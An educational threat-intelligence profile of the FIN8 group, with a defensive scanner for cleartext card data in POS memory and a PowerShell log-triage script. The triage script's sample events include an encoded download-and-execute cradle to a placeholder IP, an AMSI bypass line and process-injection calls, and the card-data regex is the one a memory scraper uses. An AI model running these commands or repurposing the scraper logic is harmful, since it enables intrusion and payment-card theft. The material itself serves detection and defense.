Threat Intelligence Tarot
cups · 4
Criminal (Eastern European, suspected)
G0061
risk 4/5
The Hospitality Thief
FIN8
Syssphinx
Targeted sectors: Hospitality · Retail · Entertainment · Restaurants · Financial services
Active since ~2016 · Point-of-sale payment card theft, Ransomware (pivot 2021), Retail and hospitality targeting
It studied the hospitality industry's POS systems, found the window in which card data sits unencrypted in POS process memory, between the swipe and settlement, and inserted itself there. Millions of card numbers, captured at the swipe, sold in batches. The Hospitality Thief is patient - it disappears for months and returns when defenses relax.
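Why that window matters is easiest to see in code. The following is an added example, not part of this profile and not FIN8 tooling: a defensive scanner that looks for cleartext Track 2 records in a snapshot of POS process memory, the same data a memory-scraping implant harvests. Against a constructed snapshot without point-to-point encryption it finds the two Luhn-valid records; against a constructed snapshot where the reader encrypted at the swipe it finds nothing. The memory layouts, field names and PANs (public Visa/Mastercard/Amex test numbers) are all constructed for the example.

```python
import re

# Track 2 layout as read from a magnetic stripe: ;PAN=YYMM<service code><discretionary>?
# PAN is 13-19 digits; the '=' field separator distinguishes it from other digit runs.
TRACK2_RE = re.compile(rb";?(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\??")


def luhn_ok(pan: str) -> bool:
    """Luhn checksum: filters digit runs that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_track2(buf: bytes) -> list:
    """Return masked hits for every Luhn-valid Track 2 record in a memory snapshot."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if not luhn_ok(pan):
            continue
        hits.append({
            "offset": m.start(),
            "pan_masked": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
            "expiry": m.group(3).decode() + "/" + m.group(2).decode(),   # MM/YY
        })
    return hits


# Constructed sample: POS process memory WITHOUT P2PE. The reader hands the application
# cleartext track data, which sits in memory until settlement. PANs are public test
# numbers, not real cards; the third record deliberately fails the Luhn check.
CLEARTEXT_POS_MEMORY = (
    b"\x00\x00PosTerminal.exe\x00txn_id=000123\x00"
    b";4111111111111111=29121011234567890?\x00"
    b"amount=4250\x00"
    b";5555555555554444=28051019876543210?\x00"
    b";4111111111111112=29121011234567890?\x00"
)

# Constructed sample: the same application WITH P2PE. The reader encrypts at the swipe,
# so memory holds only a key serial number, ciphertext (hex here) and a truncated PAN.
P2PE_POS_MEMORY = (
    b"\x00\x00PosTerminal.exe\x00txn_id=000124\x00"
    b"KSN=FFFF9876543210E00001\x00"
    b"ENC=8F1C4A77B2E0D93155C6AA0F7E21B4D8A0C3E9B1D2F4A6C8\x00"
    b"PAN_LAST4=4444\x00amount=4250\x00"
)


if __name__ == "__main__":
    for label, snapshot in (("no P2PE", CLEARTEXT_POS_MEMORY), ("P2PE", P2PE_POS_MEMORY)):
        print(label, find_track2(snapshot))
```

The same regex-plus-Luhn filter is what a scraper uses to pick card data out of a process, which is why the control that works is not hunting the scraper but removing the cleartext it hunts for.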
Tactics & Techniques
Tactics (ATT&CK Enterprise): RCN Reconnaissance · RDV Resource Development · INI Initial Access · EXC Execution · PRS Persistence · PRV Privilege Escalation · EVA Defense Evasion · CRD Credential Access · DSC Discovery · LAT Lateral Movement · COL Collection · C2 Command and Control · EXF Exfiltration · IMP Impact
  • T1566.001 Spearphishing Attachment · Initial Access
  • T1059.001 PowerShell · Execution
  • T1055 Process Injection · Defense Evasion, Privilege Escalation
  • T1003 OS Credential Dumping · Credential Access
  • T1486 Data Encrypted for Impact · Impact
  • T1134 Access Token Manipulation · Defense Evasion, Privilege Escalation
Notable Operations
  • US retail and hospitality POS memory-scraping campaigns
  • BADHATCH backdoor deployment across hospitality chains
  • Pivot to ransomware deployment (2021), later as a Noberus/ALPHV affiliate (2022)
  • Years-long gaps between campaigns - careful operational pacing
Defenses
  • Point-to-point encryption so card data is encrypted in the reader before it reaches POS memory
    PCI DSS Requirement 4 · PCI P2PE standard
  • Network segmentation isolating POS systems from the corporate LAN and the internet
    PCI DSS Requirement 1
  • PowerShell script block and module logging, plus Constrained Language Mode on POS and back-office hosts
    CIS Control 8
  • POS system integrity monitoring and application allowlisting
    CIS Control 2
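To make the PowerShell logging item concrete, here is an added example, not from this page, MITRE or any vendor product: a small triage routine over constructed Windows events, script block logs (Event ID 4104) and process-creation command lines (4688), scoring indicators that map to the techniques listed above. It decodes -EncodedCommand payloads (base64 of UTF-16LE) so the inner script is scored too, and flags download cradles, reflective assembly loading, injection APIs (T1055) and AMSI tampering. The host names, scripts, IP address (198.51.100.0/24 is a documentation range), rule weights and alert threshold are assumptions made for the example.

```python
import base64
import re

# Indicator rules: (name, regex, weight). Weights are assumed values chosen for illustration.
RULES = [
    ("encoded_command", r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("profile_or_policy_bypass", r"-nop\b|-noprofile|-(?:ep|executionpolicy)\s+bypass", 1),
    ("download_cradle", r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer|\biwr\b", 2),
    ("invoke_expression", r"\bIEX\b|Invoke-Expression", 2),
    ("reflective_load", r"\[(?:System\.)?Reflection\.Assembly\]::Load", 3),
    ("injection_api", r"VirtualAlloc|WriteProcessMemory|CreateRemoteThread|NtCreateThreadEx", 4),
    ("amsi_tamper", r"AmsiUtils|amsiInitFailed", 5),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), w) for n, p, w in RULES]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
ALERT_THRESHOLD = 5   # assumed


def decode_encoded_command(text: str):
    """-EncodedCommand carries base64 of UTF-16LE; return the inner script or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_text(text: str) -> dict:
    """Run every rule over the raw text and the decoded layer; each rule counts once."""
    indicators = {}
    decoded = decode_encoded_command(text)
    for layer in (text, decoded or ""):
        for name, rx, weight in COMPILED:
            if rx.search(layer):
                indicators[name] = weight
    score = sum(indicators.values())
    return {"score": score, "indicators": sorted(indicators),
            "decoded": decoded, "alert": score >= ALERT_THRESHOLD}


def triage(events: list) -> list:
    """Score 4104 script blocks and 4688 command lines; other event IDs are ignored."""
    results = []
    for ev in events:
        if ev["event_id"] not in (4104, 4688):
            continue
        r = score_text(ev["text"])
        r["host"], r["event_id"] = ev["host"], ev["event_id"]
        results.append(r)
    return results


def _b64_utf16le(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events; nothing here is a real log or a real FIN8 artifact.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "POS-LANE-07", "text": "Get-ChildItem C:\\Temp | Measure-Object"},
    {"event_id": 4688, "host": "POS-LANE-07", "text": "powershell.exe -nop -w hidden -enc " + _b64_utf16le(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/up.ps1')")},
    {"event_id": 4104, "host": "BACKOFFICE-01",
     "text": "$asm=[System.Reflection.Assembly]::Load($bytes); $h=CreateRemoteThread($proc,0,0,$addr,0,0,0)"},
    {"event_id": 4104, "host": "INVENTORY-02",
     "text": "Invoke-WebRequest -Uri https://inventory.example.internal/health -UseBasicParsing"},
    {"event_id": 4104, "host": "POS-LANE-03",
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"event_id": 4625, "host": "POS-LANE-03", "text": "logon failure"},
]


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["host"], r["event_id"], r["score"], r["indicators"], "ALERT" if r["alert"] else "")
```

The single Invoke-WebRequest from the inventory host stays below threshold on its own, while the encoded launcher scores on both its outer flags and the decoded cradle; that layering is the point of script block logging, since the 4104 record shows the script after decoding even when the command line does not.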
Reversed: Their Weakness
FIN8's unusual operational pattern - long pauses between campaigns - cuts both ways. Quiet periods let indicators go stale and tempt teams to retire detections, but they also give defenders time to segment POS networks, patch, and refresh detection content before the group returns. Treat silence as a window to harden, not as evidence that the threat has gone.

Data sourced from MITRE ATT&CK. For educational purposes.